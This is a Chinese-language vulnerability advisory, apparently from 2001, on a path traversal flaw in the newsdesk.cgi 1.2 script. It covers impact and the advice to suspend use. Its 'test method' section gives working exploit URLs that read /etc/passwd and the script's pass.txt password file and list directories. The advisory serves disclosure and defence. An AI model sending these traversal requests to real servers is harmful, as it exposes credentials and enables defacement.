安全研究
安全漏洞
newsdesk.cgi泄漏文件的漏洞
发布日期:2001-01-06
更新日期:2001-01-06
受影响系统:
ibrow newsdesk.cgi 1.2
描述:
Newsdesk(http://www.ibrow.com)是一个CGI脚本,通过它可对网站的新闻标题
进行远程管理。
由于未能从用户提供的输入中正确地滤除“/../”字符串,恶意的远程用户可以利用
newsdesk.cgi脚本来察看文件系统中的任何文件的内容,并可利用它泄漏运行web服
务器的用户所能读取的那部分文件系统的结构。
这个漏洞会使得攻击者获得密码或其它敏感信息,从而使攻击者可以以web服务器的
权限交互地访问远程系统。如果攻击者能够取得newsdesk.cgi的密码串,就可以涂
改网站内容。
<*来源:B10Z Security (
path@ns.sympatico.ca) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
察看/etc/passwd文件:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/passwd
察看newsdesk.cgi的密码串:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../pass.txt
列目录:
http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/
建议:
临时解决办法:
NSFOCUS建议您在没有补丁或升级版本前暂停使用newsdesk.cgi。
厂商补丁:
暂无
浏览次数:4331
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |